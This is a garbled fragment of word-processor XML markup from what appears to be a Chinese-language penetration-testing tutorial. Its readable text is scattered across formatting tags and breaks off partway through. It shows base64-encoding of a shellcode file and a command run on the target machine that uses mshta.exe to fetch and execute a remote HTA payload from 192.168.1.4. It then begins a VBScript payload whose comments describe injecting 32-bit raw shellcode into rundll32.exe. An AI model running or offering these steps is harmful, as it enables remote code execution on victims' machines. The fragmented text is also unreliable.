3995,14559,3995,14558,3995,14557,3995,14556,3995,14555,3995,14553,3995,14552,3995,14551,3995,14549,3995,14548,3995,14547,3995,14545,3995,14544,3995,14542,3995,14540,3995,14539,3995,14537,3995,14535,3995,14533,3995,14531,3995,14529,3995,14527,3995,14525,3995,14523,3995,14521,3995,14519,3995,14517,3995,14514,3995,14512,3995,14509,3995,14507,3995,14504,3995,14501,3995,14499,3995,14496,3995,14493,3995,14490,3995,14487,3995,14484,3995,14481,3995,14478,3995,14474,3995,14471,3995,14468,3995,14464,3995,14461,3995,14457,3995,14453,3995,14449,3995,14445,3995,14442,3995,14437,3995,14433,3995,14429,3995,14425,3995,14420,3995,14416,3995,14411,3995,14407,3995,14402,3995,14397,3995,14393,3995,14388,3995,14382,3995,14377,3995,14372,3995,14367,3995,14361,3995,14356e x" fillcolor="#fefefe" stroke="f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74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0" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="20"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="27"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>w</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="26"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>0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50" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1103" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>替换</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如下：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62" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="242" w:lineRule="auto"/>
        <w:ind w:left="1103" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="130" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>mshta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>exe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404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>//192.168.1.4/Micropoor.hta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49" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="319" w:lineRule="auto"/>
        <w:ind w:left="1103" w:right="8659" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>附录：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Mic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ropoor.hta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="15"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>注：x86</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-35"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="206" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="354" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="7077" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>language</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="11"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="659800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"VBScript"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>&gt;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新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="10" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1609" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="12"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:spacing w:val="16"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Usage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="113" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1371" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="4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'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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Choose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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404549"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>binary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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want</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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0076a9"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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inject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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659800"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>"rundll32.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="16"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>note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Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>pad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>calc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="404549"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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4"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="79" w:after="0" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="1622" w:right="1371" w:firstLine="-12"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:spacing w:val="4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'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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Generate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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404549"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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980053"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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0076a9"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>bit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>raw</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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shellcode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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996c38"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas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whatever</w:t>
      </w:r>
      <w:r>
        <w:rPr>
